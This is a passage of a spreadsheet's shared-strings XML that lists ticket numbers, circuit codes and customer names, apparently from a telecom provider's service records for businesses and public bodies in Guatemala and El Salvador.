    <t>F4553204</t>
  </si>
  <si>
    <t>90001909355T</t>
  </si>
  <si>
    <t>F4553222</t>
  </si>
  <si>
    <t>F4553223</t>
  </si>
  <si>
    <t>MP240827002SSV</t>
  </si>
  <si>
    <t>F4553226</t>
  </si>
  <si>
    <t>780373OH</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000355</t>
  </si>
  <si>
    <t>90001801333T</t>
  </si>
  <si>
    <t>61300007T</t>
  </si>
  <si>
    <t>F4553249</t>
  </si>
  <si>
    <t>F4582112</t>
  </si>
  <si>
    <t>F4582128</t>
  </si>
  <si>
    <t>30900009T</t>
  </si>
  <si>
    <t>F4582139</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_3109</t>
  </si>
  <si>
    <t>F4582141</t>
  </si>
  <si>
    <t>F4582149</t>
  </si>
  <si>
    <t>F4582156</t>
  </si>
  <si>
    <t>F4582168</t>
  </si>
  <si>
    <t>F4582171</t>
  </si>
  <si>
    <t>F4612562</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T015</t>
  </si>
  <si>
    <t>F4612567</t>
  </si>
  <si>
    <t>841400016T</t>
  </si>
  <si>
    <t>TRIBUNAL SUPREMO ELECTORAL (SIM)</t>
  </si>
  <si>
    <t>F4612570</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T45</t>
  </si>
  <si>
    <t>807900312T</t>
  </si>
  <si>
    <t>406400068T</t>
  </si>
  <si>
    <t>892000004T</t>
  </si>
  <si>
    <t>COOPERATIVA INTEGRAL DE AHORRO Y CRÉDITO KATO-KI, R. L.</t>
  </si>
  <si>
    <t>F4612596</t>
  </si>
  <si>
    <t>TEMPORAL</t>
  </si>
  <si>
    <t>272500018T</t>
  </si>
  <si>
    <t>F4612602</t>
  </si>
  <si>
    <t>25936100SV</t>
  </si>
  <si>
    <t>1494253OH</t>
  </si>
  <si>
    <t xml:space="preserve">CONSTRUCTORA SERPIC						</t>
  </si>
  <si>
    <t>25236600SV</t>
  </si>
  <si>
    <t>SUPERINTENDENCIA DE LA COMPETENCIA</t>
  </si>
  <si>
    <t>419100003T</t>
  </si>
  <si>
    <t>F4612617</t>
  </si>
  <si>
    <t>F4612619</t>
  </si>
  <si>
    <t>292900097T</t>
  </si>
  <si>
    <t>F4612623</t>
  </si>
  <si>
    <t>F4612624</t>
  </si>
  <si>
    <t>IP2383069SV</t>
  </si>
  <si>
    <t>F4612629</t>
  </si>
  <si>
    <t>F4612630</t>
  </si>
  <si>
    <t>90001906183T</t>
  </si>
  <si>
    <t>F4612637</t>
  </si>
  <si>
    <t>1735715OH</t>
  </si>
  <si>
    <t>25113800SV</t>
  </si>
  <si>
    <t>CORPORACION DE TIENDAS INTERNACIONALES S.A. DE C.V.</t>
  </si>
  <si>
    <t>5581226ON</t>
  </si>
  <si>
    <t>F4612666</t>
  </si>
  <si>
    <t>1378721OH</t>
  </si>
  <si>
    <t>ORDEN HOSPITALARIA DE SAN JUAN DE DIOS</t>
  </si>
  <si>
    <t>781100004T</t>
  </si>
  <si>
    <t>F4612691</t>
  </si>
  <si>
    <t>235400057T</t>
  </si>
  <si>
    <t>F4612695</t>
  </si>
  <si>
    <t>F4612715</t>
  </si>
  <si>
    <t>F4540848</t>
  </si>
  <si>
    <t>ID1182040SV</t>
  </si>
  <si>
    <t>SABA SA DE CV</t>
  </si>
  <si>
    <t>F4576782</t>
  </si>
  <si>
    <t>F4576787</t>
  </si>
  <si>
    <t>ID1314002SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL MASAHUAT</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1261</t>
  </si>
  <si>
    <t>F4576792</t>
  </si>
  <si>
    <t>F4576795</t>
  </si>
  <si>
    <t>447400018T</t>
  </si>
  <si>
    <t>F4576812</t>
  </si>
  <si>
    <t>F4576814</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_CENTRAL_3</t>
  </si>
  <si>
    <t>428700007T</t>
  </si>
  <si>
    <t>F4576817</t>
  </si>
  <si>
    <t>F4576821</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C104</t>
  </si>
  <si>
    <t>1086827OH</t>
  </si>
  <si>
    <t>265900184T</t>
  </si>
  <si>
    <t>F4576835</t>
  </si>
  <si>
    <t>F4576839</t>
  </si>
  <si>
    <t>F4576843</t>
  </si>
  <si>
    <t>F4576848</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DF_JIQUILISCO</t>
  </si>
  <si>
    <t>F4576850</t>
  </si>
  <si>
    <t>F4576853</t>
  </si>
  <si>
    <t>F4576862</t>
  </si>
  <si>
    <t>7800360T</t>
  </si>
  <si>
    <t>F4576873</t>
  </si>
  <si>
    <t>397200005T</t>
  </si>
  <si>
    <t>1725019OH</t>
  </si>
  <si>
    <t>OH1000648579/EMPRESA DE SEGURIDAD Y VIGILANCIA PRIVADA PROTEC -</t>
  </si>
  <si>
    <t>863400137T</t>
  </si>
  <si>
    <t>IP2169011SV</t>
  </si>
  <si>
    <t>F4576884</t>
  </si>
  <si>
    <t>29500045T</t>
  </si>
  <si>
    <t>868000012T</t>
  </si>
  <si>
    <t>25263600SV</t>
  </si>
  <si>
    <t>237400402T</t>
  </si>
  <si>
    <t>F4576901</t>
  </si>
  <si>
    <t>452881ON</t>
  </si>
  <si>
    <t>24206400SV</t>
  </si>
  <si>
    <t>1234846OH</t>
  </si>
  <si>
    <t>F4571439</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_CALVARIO</t>
  </si>
  <si>
    <t>F4571455</t>
  </si>
  <si>
    <t>F4571459</t>
  </si>
  <si>
    <t>F4571460</t>
  </si>
  <si>
    <t>ID1112076SV</t>
  </si>
  <si>
    <t xml:space="preserve">MINISTERIO DE EDUCACION										</t>
  </si>
  <si>
    <t>39200042T</t>
  </si>
  <si>
    <t>F4571476</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_549</t>
  </si>
  <si>
    <t>F4571496</t>
  </si>
  <si>
    <t>F4571499</t>
  </si>
  <si>
    <t>F4571500</t>
  </si>
  <si>
    <t>F4571516</t>
  </si>
  <si>
    <t>CC_INVERSIONES_CENTROAMERICANAS_GT_ZONA_1_BARBENERA</t>
  </si>
  <si>
    <t>947700001T</t>
  </si>
  <si>
    <t>INGOP,SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4571529</t>
  </si>
  <si>
    <t>F4571533</t>
  </si>
  <si>
    <t>61200230T</t>
  </si>
  <si>
    <t>21333800SV</t>
  </si>
  <si>
    <t>D I P O L S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4571561</t>
  </si>
  <si>
    <t>F4571567</t>
  </si>
  <si>
    <t>875700004T</t>
  </si>
  <si>
    <t>COMERCIAL AGRICOLA INDUSTRIAL CENTROAMERICANA, S.A.</t>
  </si>
  <si>
    <t>F4571571</t>
  </si>
  <si>
    <t>F4571572</t>
  </si>
  <si>
    <t>F4571574</t>
  </si>
  <si>
    <t>758500337T</t>
  </si>
  <si>
    <t>18600009T</t>
  </si>
  <si>
    <t>F4571584</t>
  </si>
  <si>
    <t>F4604410</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_152</t>
  </si>
  <si>
    <t>F4604419</t>
  </si>
  <si>
    <t>F4604422</t>
  </si>
  <si>
    <t>F4604430</t>
  </si>
  <si>
    <t>F4604435</t>
  </si>
  <si>
    <t>622006OH</t>
  </si>
  <si>
    <t>F4604437</t>
  </si>
  <si>
    <t>F4604440</t>
  </si>
  <si>
    <t>F4604441</t>
  </si>
  <si>
    <t>F4604454</t>
  </si>
  <si>
    <t>349900404T</t>
  </si>
  <si>
    <t>90001908099T</t>
  </si>
  <si>
    <t>625900176T</t>
  </si>
  <si>
    <t>F4604461</t>
  </si>
  <si>
    <t>38300610T</t>
  </si>
  <si>
    <t>F4604465</t>
  </si>
  <si>
    <t>23276100SV</t>
  </si>
  <si>
    <t>1393326OH</t>
  </si>
  <si>
    <t>256700009T</t>
  </si>
  <si>
    <t>F4604478</t>
  </si>
  <si>
    <t>F4604479</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_BARBERENA</t>
  </si>
  <si>
    <t>F4604481</t>
  </si>
  <si>
    <t>F4604482</t>
  </si>
  <si>
    <t>47503298T</t>
  </si>
  <si>
    <t>744300001T</t>
  </si>
  <si>
    <t>LA SABROSONA, S.A.</t>
  </si>
  <si>
    <t>F4604492</t>
  </si>
  <si>
    <t>F4604504</t>
  </si>
  <si>
    <t>758500318T</t>
  </si>
  <si>
    <t>90001910488T</t>
  </si>
  <si>
    <t>8902629T</t>
  </si>
  <si>
    <t>297401131T</t>
  </si>
  <si>
    <t>F4604535</t>
  </si>
  <si>
    <t>F4604536</t>
  </si>
  <si>
    <t>F4604547</t>
  </si>
  <si>
    <t>42700518T</t>
  </si>
  <si>
    <t>47503341T</t>
  </si>
  <si>
    <t>5211920ON</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4203</t>
  </si>
  <si>
    <t>CONTR0001852703OC</t>
  </si>
  <si>
    <t>905954OH</t>
  </si>
  <si>
    <t>F4553756</t>
  </si>
  <si>
    <t>400000032T</t>
  </si>
  <si>
    <t>F4553773</t>
  </si>
  <si>
    <t>4032416ON</t>
  </si>
  <si>
    <t>ON0000355056/DIRECCION GENERAL DE INGRESOS           CS03-DGI/2015</t>
  </si>
  <si>
    <t>ID1130020SV</t>
  </si>
  <si>
    <t>90001908113T</t>
  </si>
  <si>
    <t>F4553803</t>
  </si>
  <si>
    <t>F4553804</t>
  </si>
  <si>
    <t>F4553806</t>
  </si>
  <si>
    <t>8200149T</t>
  </si>
  <si>
    <t>25114000SV</t>
  </si>
  <si>
    <t>PDC COMERCIAL EL SALVADOR,S.A DE C.V.</t>
  </si>
  <si>
    <t>F4553816</t>
  </si>
  <si>
    <t>47502069T</t>
  </si>
  <si>
    <t>F4553825</t>
  </si>
  <si>
    <t>62300209T</t>
  </si>
  <si>
    <t>F4553831</t>
  </si>
  <si>
    <t>F4553832</t>
  </si>
  <si>
    <t>F4553836</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4627</t>
  </si>
  <si>
    <t>829800022T</t>
  </si>
  <si>
    <t>F4553844</t>
  </si>
  <si>
    <t>F4553846</t>
  </si>
  <si>
    <t>IP2219016SV</t>
  </si>
  <si>
    <t>F4553852</t>
  </si>
  <si>
    <t>F4553859</t>
  </si>
  <si>
    <t>8901445T</t>
  </si>
  <si>
    <t>773400034T</t>
  </si>
  <si>
    <t>F4553868</t>
  </si>
  <si>
    <t>ID1036068SV</t>
  </si>
  <si>
    <t xml:space="preserve">CORPORATIVE SYSTEMS OF HEALTH S.A. DE C.V.										</t>
  </si>
  <si>
    <t>TP000499SV</t>
  </si>
  <si>
    <t>349900134T</t>
  </si>
  <si>
    <t>F4583781</t>
  </si>
  <si>
    <t>F4583800</t>
  </si>
  <si>
    <t>297400419T</t>
  </si>
  <si>
    <t>CONTR0002771949OC</t>
  </si>
  <si>
    <t>331000137T</t>
  </si>
  <si>
    <t>F4583821</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_ZONA_9</t>
  </si>
  <si>
    <t>F4583822</t>
  </si>
  <si>
    <t>781400003T</t>
  </si>
  <si>
    <t>F4583830</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C178</t>
  </si>
  <si>
    <t>773800001T</t>
  </si>
  <si>
    <t>PORTAFOLIO DE INVERSIONES S.A.</t>
  </si>
  <si>
    <t>F4583847</t>
  </si>
  <si>
    <t>535200065T</t>
  </si>
  <si>
    <t>292900547T</t>
  </si>
  <si>
    <t>808100001T</t>
  </si>
  <si>
    <t>TTPI SERVICIOS FINACIEROS Y OPERACIONALES S.A. (ARS GUATEMALA)</t>
  </si>
  <si>
    <t>673000036T</t>
  </si>
  <si>
    <t>F4583860</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_4090</t>
  </si>
  <si>
    <t>F4583871</t>
  </si>
  <si>
    <t>F4583887</t>
  </si>
  <si>
    <t>IP2029182SV</t>
  </si>
  <si>
    <t>780200001T</t>
  </si>
  <si>
    <t>QUETZAL ASISTENCIA (MAPFRE)</t>
  </si>
  <si>
    <t>F4583914</t>
  </si>
  <si>
    <t>F4583916</t>
  </si>
  <si>
    <t>F4613885</t>
  </si>
  <si>
    <t>CC_FICOHSA_GT_INTERNET_AGENCIA_0585</t>
  </si>
  <si>
    <t>F4613892</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0699</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0497</t>
  </si>
  <si>
    <t>237400426T</t>
  </si>
  <si>
    <t>F4613907</t>
  </si>
  <si>
    <t>25265600SV</t>
  </si>
  <si>
    <t>CONSORCIO AUTOMOTRIZ S.A. DE C.V.</t>
  </si>
  <si>
    <t>433700002T</t>
  </si>
  <si>
    <t>F4613927</t>
  </si>
  <si>
    <t>1747973OH</t>
  </si>
  <si>
    <t>352200010T</t>
  </si>
  <si>
    <t>AEROVIAS DE MEXICO S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4613963</t>
  </si>
  <si>
    <t>349900418T</t>
  </si>
  <si>
    <t>F4613971</t>
  </si>
  <si>
    <t>F4613993</t>
  </si>
  <si>
    <t>23302900SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL EL ROSARIO LA PAZ</t>
  </si>
  <si>
    <t>F4613995</t>
  </si>
  <si>
    <t>511300004T</t>
  </si>
  <si>
    <t>F4614001</t>
  </si>
  <si>
    <t>F4614005</t>
  </si>
  <si>
    <t>F4614009</t>
  </si>
  <si>
    <t>F4614010</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_079</t>
  </si>
  <si>
    <t>61200210T</t>
  </si>
  <si>
    <t>90001904264T</t>
  </si>
  <si>
    <t>810500041T</t>
  </si>
  <si>
    <t>47502965T</t>
  </si>
  <si>
    <t>F4577092</t>
  </si>
  <si>
    <t>F4577097</t>
  </si>
  <si>
    <t>F4577107</t>
  </si>
  <si>
    <t>F4577117</t>
  </si>
  <si>
    <t>F4577118</t>
  </si>
  <si>
    <t>24893100SV</t>
  </si>
  <si>
    <t>GARAN DE EL SALVADOR  S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4577137</t>
  </si>
  <si>
    <t>F4577138</t>
  </si>
  <si>
    <t>38300538T</t>
  </si>
  <si>
    <t>F4577145</t>
  </si>
  <si>
    <t>F4577147</t>
  </si>
  <si>
    <t>F4577149</t>
  </si>
  <si>
    <t>668900003T</t>
  </si>
  <si>
    <t>F4577159</t>
  </si>
  <si>
    <t>F4577160</t>
  </si>
  <si>
    <t>F4577161</t>
  </si>
  <si>
    <t>F4577169</t>
  </si>
  <si>
    <t>F4577170</t>
  </si>
  <si>
    <t>F4577171</t>
  </si>
  <si>
    <t>F4577184</t>
  </si>
  <si>
    <t>ID1033071SV</t>
  </si>
  <si>
    <t>TRANSPORTES LEMUS INTERNACIONAL SA DE CV</t>
  </si>
  <si>
    <t>F4577193</t>
  </si>
  <si>
    <t>F4577194</t>
  </si>
  <si>
    <t>F4577197</t>
  </si>
  <si>
    <t>90001907131T</t>
  </si>
  <si>
    <t>758500027T</t>
  </si>
  <si>
    <t>47500942T</t>
  </si>
  <si>
    <t>IP2028530SV</t>
  </si>
  <si>
    <t>F4577212</t>
  </si>
  <si>
    <t>432800055T</t>
  </si>
  <si>
    <t>613512ON</t>
  </si>
  <si>
    <t>F4577219</t>
  </si>
  <si>
    <t>F4573063</t>
  </si>
  <si>
    <t>CC_GMG_SV_T057_CHALCHUAPA</t>
  </si>
  <si>
    <t>47503900T</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0697</t>
  </si>
  <si>
    <t>F4573089</t>
  </si>
  <si>
    <t>F4573090</t>
  </si>
  <si>
    <t>F4573095</t>
  </si>
  <si>
    <t>F4573155</t>
  </si>
  <si>
    <t>F4573157</t>
  </si>
  <si>
    <t>F4573186</t>
  </si>
  <si>
    <t>F4573214</t>
  </si>
  <si>
    <t>F4573216</t>
  </si>
  <si>
    <t>F4605270</t>
  </si>
  <si>
    <t>649100002T</t>
  </si>
  <si>
    <t>F4605271</t>
  </si>
  <si>
    <t>3707864ON</t>
  </si>
  <si>
    <t>F4605277</t>
  </si>
  <si>
    <t>F4605282</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_INTERNET_SOLOLA</t>
  </si>
  <si>
    <t>5097860ON</t>
  </si>
  <si>
    <t>ID1205006SV</t>
  </si>
  <si>
    <t>CIA.DE ASES.Y SEGURIDAD S.A. DE C.V.</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0096</t>
  </si>
  <si>
    <t>F4605300</t>
  </si>
  <si>
    <t>F4605303</t>
  </si>
  <si>
    <t>F4605310</t>
  </si>
  <si>
    <t>F4605324</t>
  </si>
  <si>
    <t>F4605325</t>
  </si>
  <si>
    <t>297400422T</t>
  </si>
  <si>
    <t>F4605332</t>
  </si>
  <si>
    <t>340500062T</t>
  </si>
  <si>
    <t>F4605346</t>
  </si>
  <si>
    <t>F4605348</t>
  </si>
  <si>
    <t>90001908216T</t>
  </si>
  <si>
    <t>902500001T</t>
  </si>
  <si>
    <t>GRUPO ALIMAS, S.A.</t>
  </si>
  <si>
    <t>F4605359</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4235</t>
  </si>
  <si>
    <t>F4605360</t>
  </si>
  <si>
    <t>628100003T</t>
  </si>
  <si>
    <t>CONSORCIO ELIPSIS SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>389100001T</t>
  </si>
  <si>
    <t>HOSPITAL NACIONAL DE CUILAPA SANTA ROSA</t>
  </si>
  <si>
    <t>22736000SV</t>
  </si>
  <si>
    <t>POLLO CAMPERO DE EL SALVADOR, S.A. DE C.V.</t>
  </si>
  <si>
    <t>22319800SV</t>
  </si>
  <si>
    <t>DON POLLO S.A. DE C.V.</t>
  </si>
  <si>
    <t>90001905311T</t>
  </si>
  <si>
    <t>F4605372</t>
  </si>
  <si>
    <t>F4605373</t>
  </si>
  <si>
    <t>F4605375</t>
  </si>
  <si>
    <t>F4605376</t>
  </si>
  <si>
    <t>869400001T</t>
  </si>
  <si>
    <t>MAGIC TOUCH SALON &amp; SPA</t>
  </si>
  <si>
    <t>F4605417</t>
  </si>
  <si>
    <t>F4605418</t>
  </si>
  <si>
    <t>F4547104</t>
  </si>
  <si>
    <t>F4547117</t>
  </si>
  <si>
    <t>F4547118</t>
  </si>
  <si>
    <t>F4547124</t>
  </si>
  <si>
    <t>F4547138</t>
  </si>
  <si>
    <t>341800224T</t>
  </si>
  <si>
    <t>F4547148</t>
  </si>
  <si>
    <t>F4547149</t>
  </si>
  <si>
    <t>F4547153</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T209</t>
  </si>
  <si>
    <t>F4547156</t>
  </si>
  <si>
    <t>F4547180</t>
  </si>
  <si>
    <t>70052OH</t>
  </si>
  <si>
    <t>349900333T</t>
  </si>
  <si>
    <t>F4547198</t>
  </si>
  <si>
    <t>F4547203</t>
  </si>
  <si>
    <t>F4547213</t>
  </si>
  <si>
    <t>47503795T</t>
  </si>
  <si>
    <t>F4547215</t>
  </si>
  <si>
    <t>F4547245</t>
  </si>
  <si>
    <t>F4547258</t>
  </si>
  <si>
    <t>90001910368T</t>
  </si>
  <si>
    <t>F4553897</t>
  </si>
  <si>
    <t>F4553899</t>
  </si>
  <si>
    <t>F4553903</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_INTERNET_PROGRESO_JUTIAPA</t>
  </si>
  <si>
    <t>807900008T</t>
  </si>
  <si>
    <t>807900004T</t>
  </si>
  <si>
    <t>F4553914</t>
  </si>
  <si>
    <t>F4553917</t>
  </si>
  <si>
    <t>F4553920</t>
  </si>
  <si>
    <t>F4553936</t>
  </si>
  <si>
    <t>F4553937</t>
  </si>
  <si>
    <t>F4553939</t>
  </si>
  <si>
    <t>F4553940</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_GUATEFACTURAS</t>
  </si>
  <si>
    <t>1036923OH</t>
  </si>
  <si>
    <t>F4553959</t>
  </si>
  <si>
    <t>625900214T</t>
  </si>
  <si>
    <t>807900253T</t>
  </si>
  <si>
    <t>F4554001</t>
  </si>
  <si>
    <t>832382OH</t>
  </si>
  <si>
    <t>F4554013</t>
  </si>
  <si>
    <t>F4554043</t>
  </si>
  <si>
    <t>F4554045</t>
  </si>
  <si>
    <t>680900005T</t>
  </si>
  <si>
    <t>F4554051</t>
  </si>
  <si>
    <t>F4589309</t>
  </si>
  <si>
    <t>F4589310</t>
  </si>
  <si>
    <t>F4589314</t>
  </si>
  <si>
    <t>UNION COMERCIAL DE GUATEMALA, S.A..</t>
  </si>
  <si>
    <t>F4589319</t>
  </si>
  <si>
    <t>F4589330</t>
  </si>
  <si>
    <t>F4589333</t>
  </si>
  <si>
    <t>F4589338</t>
  </si>
  <si>
    <t>1030344OH</t>
  </si>
  <si>
    <t>F4589342</t>
  </si>
  <si>
    <t>F4589364</t>
  </si>
  <si>
    <t>F4589365</t>
  </si>
  <si>
    <t>F4589366</t>
  </si>
  <si>
    <t>863400414T</t>
  </si>
  <si>
    <t>F4589379</t>
  </si>
  <si>
    <t>F4589385</t>
  </si>
  <si>
    <t>483741ON</t>
  </si>
  <si>
    <t>ON0000502866/ALMACENES SIMAN S.A.-</t>
  </si>
  <si>
    <t>1719947OH</t>
  </si>
  <si>
    <t>OH1001076566</t>
  </si>
  <si>
    <t>F4589409</t>
  </si>
  <si>
    <t>F4589410</t>
  </si>
  <si>
    <t>F4589412</t>
  </si>
  <si>
    <t>265900406T</t>
  </si>
  <si>
    <t>TP000308SV</t>
  </si>
  <si>
    <t>832957OC</t>
  </si>
  <si>
    <t>818900001T</t>
  </si>
  <si>
    <t>CORPORACION ALUARCA, S.A.</t>
  </si>
  <si>
    <t>IP2028563SV</t>
  </si>
  <si>
    <t>CAJA DE CREDITO DE SAN IGNACIO</t>
  </si>
  <si>
    <t>22329400SV</t>
  </si>
  <si>
    <t>JOSE ANTONIO RUIZ MORALES</t>
  </si>
  <si>
    <t>1735691OH</t>
  </si>
  <si>
    <t>289900001T</t>
  </si>
  <si>
    <t>INDUSTRIA Y DESARROLLO TURISTICO S.A.</t>
  </si>
  <si>
    <t>317500040T</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_KIO_NETWORKS</t>
  </si>
  <si>
    <t>F4614086</t>
  </si>
  <si>
    <t>F4614089</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000327</t>
  </si>
  <si>
    <t>758500269T</t>
  </si>
  <si>
    <t>F4614111</t>
  </si>
  <si>
    <t>F4614115</t>
  </si>
  <si>
    <t>F4614121</t>
  </si>
  <si>
    <t>F4614125</t>
  </si>
  <si>
    <t>25119800SV</t>
  </si>
  <si>
    <t>TECNOGLOBAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4614130</t>
  </si>
  <si>
    <t>CC_WALMART_SV_MAXIDESPENSA_TRONCAL_DEL_NORTE</t>
  </si>
  <si>
    <t>F4614134</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0079</t>
  </si>
  <si>
    <t>F4614135</t>
  </si>
  <si>
    <t>F4614138</t>
  </si>
  <si>
    <t>F4614144</t>
  </si>
  <si>
    <t>265900158T</t>
  </si>
  <si>
    <t>F4614153</t>
  </si>
  <si>
    <t>4956317ON</t>
  </si>
  <si>
    <t>F4614187</t>
  </si>
  <si>
    <t>F4614196</t>
  </si>
  <si>
    <t>906800001T</t>
  </si>
  <si>
    <t>AGUA SERVICIOS Y SUMINISTROS, S.A.</t>
  </si>
  <si>
    <t>F4578600</t>
  </si>
  <si>
    <t>1425397OH</t>
  </si>
  <si>
    <t>F4578602</t>
  </si>
  <si>
    <t>1595126OH</t>
  </si>
  <si>
    <t>BURÓ INTERNACIONAL DE TECNOLOGIAS HONDURAS S DE RL</t>
  </si>
  <si>
    <t>F4578612</t>
  </si>
  <si>
    <t>ID1330004SV</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAYAXCHE</t>
  </si>
  <si>
    <t>F4578635</t>
  </si>
  <si>
    <t>F4578639</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_AGENCIA_ANAMOROS</t>
  </si>
  <si>
    <t>F4578641</t>
  </si>
  <si>
    <t>535200067T</t>
  </si>
  <si>
    <t>F4578646</t>
  </si>
  <si>
    <t>939858OH</t>
  </si>
  <si>
    <t>F4578652</t>
  </si>
  <si>
    <t>F4578653</t>
  </si>
  <si>
    <t>1364627OH</t>
  </si>
  <si>
    <t>F4578659</t>
  </si>
  <si>
    <t>F4578661</t>
  </si>
  <si>
    <t>F4578664</t>
  </si>
  <si>
    <t>F4578665</t>
  </si>
  <si>
    <t>F4578669</t>
  </si>
  <si>
    <t>F4578672</t>
  </si>
  <si>
    <t>1341027OH</t>
  </si>
  <si>
    <t>735964OH</t>
  </si>
  <si>
    <t>F4578677</t>
  </si>
  <si>
    <t>F4578682</t>
  </si>
  <si>
    <t>F4578686</t>
  </si>
  <si>
    <t>8000082T</t>
  </si>
  <si>
    <t>F4578721</t>
  </si>
  <si>
    <t>F4578722</t>
  </si>
  <si>
    <t>F4578727</t>
  </si>
  <si>
    <t>F4578730</t>
  </si>
  <si>
    <t>F4578734</t>
  </si>
  <si>
    <t>F4578743</t>
  </si>
  <si>
    <t>F4578744</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0196</t>
  </si>
  <si>
    <t>361700381T</t>
  </si>
  <si>
    <t>F4573661</t>
  </si>
  <si>
    <t>F4573664</t>
  </si>
  <si>
    <t>F4573675</t>
  </si>
  <si>
    <t>563300002T</t>
  </si>
  <si>
    <t>MULTIASESORES, S.A.</t>
  </si>
  <si>
    <t>F4573677</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_SAN_JOSE_PINULA</t>
  </si>
  <si>
    <t>F4573696</t>
  </si>
  <si>
    <t>F4573697</t>
  </si>
  <si>
    <t>F4573698</t>
  </si>
  <si>
    <t>F4573699</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_Z1_BARBERENA_SANTA_ROSA</t>
  </si>
  <si>
    <t>F4573730</t>
  </si>
  <si>
    <t>F4573733</t>
  </si>
  <si>
    <t>F4573737</t>
  </si>
  <si>
    <t>201900022T</t>
  </si>
  <si>
    <t>F4573740</t>
  </si>
  <si>
    <t>8902072T</t>
  </si>
  <si>
    <t>F4573745</t>
  </si>
  <si>
    <t>F4573746</t>
  </si>
  <si>
    <t>F4573752</t>
  </si>
  <si>
    <t>F4573760</t>
  </si>
  <si>
    <t>47503091T</t>
  </si>
  <si>
    <t>F4573761</t>
  </si>
  <si>
    <t>F4573767</t>
  </si>
  <si>
    <t>F4573781</t>
  </si>
  <si>
    <t>F4607241</t>
  </si>
  <si>
    <t>F4607273</t>
  </si>
  <si>
    <t>F4607308</t>
  </si>
  <si>
    <t>F4607314</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_1470001</t>
  </si>
  <si>
    <t>F4607356</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0242</t>
  </si>
  <si>
    <t>F4607418</t>
  </si>
  <si>
    <t>F4560350</t>
  </si>
  <si>
    <t>F4560356</t>
  </si>
  <si>
    <t>90001909084T</t>
  </si>
  <si>
    <t>F4560357</t>
  </si>
  <si>
    <t>F4560358</t>
  </si>
  <si>
    <t>F4560365</t>
  </si>
  <si>
    <t>245700102T</t>
  </si>
  <si>
    <t>F4560376</t>
  </si>
  <si>
    <t>FH3433</t>
  </si>
  <si>
    <t>F4560386</t>
  </si>
  <si>
    <t>F4560390</t>
  </si>
  <si>
    <t>F4560391</t>
  </si>
  <si>
    <t>F4560400</t>
  </si>
  <si>
    <t>F4560403</t>
  </si>
  <si>
    <t>FG9127G</t>
  </si>
  <si>
    <t>F4560405</t>
  </si>
  <si>
    <t>F4560410</t>
  </si>
  <si>
    <t>IP2107001SV</t>
  </si>
  <si>
    <t>GENERADORA ELECTRICA CENTRAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4560422</t>
  </si>
  <si>
    <t>5094210ON</t>
  </si>
  <si>
    <t>452853ON</t>
  </si>
  <si>
    <t>F4560437</t>
  </si>
  <si>
    <t>F4560441</t>
  </si>
  <si>
    <t>876400001T</t>
  </si>
  <si>
    <t>AGROINDUSTRIAS DE LA ROCA DELGADO, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>1239753OH</t>
  </si>
  <si>
    <t>ENLACES CONTRIBUCION EN ESPECIE CONATEL</t>
  </si>
  <si>
    <t>F4560446</t>
  </si>
  <si>
    <t>F4560448</t>
  </si>
  <si>
    <t>533331OH</t>
  </si>
  <si>
    <t>F4560451</t>
  </si>
  <si>
    <t>90001909033T</t>
  </si>
  <si>
    <t>8200188T</t>
  </si>
  <si>
    <t>IP2148072SV</t>
  </si>
  <si>
    <t>297702183T</t>
  </si>
  <si>
    <t>F4555280</t>
  </si>
  <si>
    <t>F4555281</t>
  </si>
  <si>
    <t>F4555339</t>
  </si>
  <si>
    <t>F4555341</t>
  </si>
  <si>
    <t>F4555342</t>
  </si>
  <si>
    <t>F4555344</t>
  </si>
  <si>
    <t>F4555346</t>
  </si>
  <si>
    <t>F4555348</t>
  </si>
  <si>
    <t>F4555354</t>
  </si>
  <si>
    <t>F4555355</t>
  </si>
  <si>
    <t>F4555356</t>
  </si>
  <si>
    <t>F4555357</t>
  </si>
  <si>
    <t>F4555359</t>
  </si>
  <si>
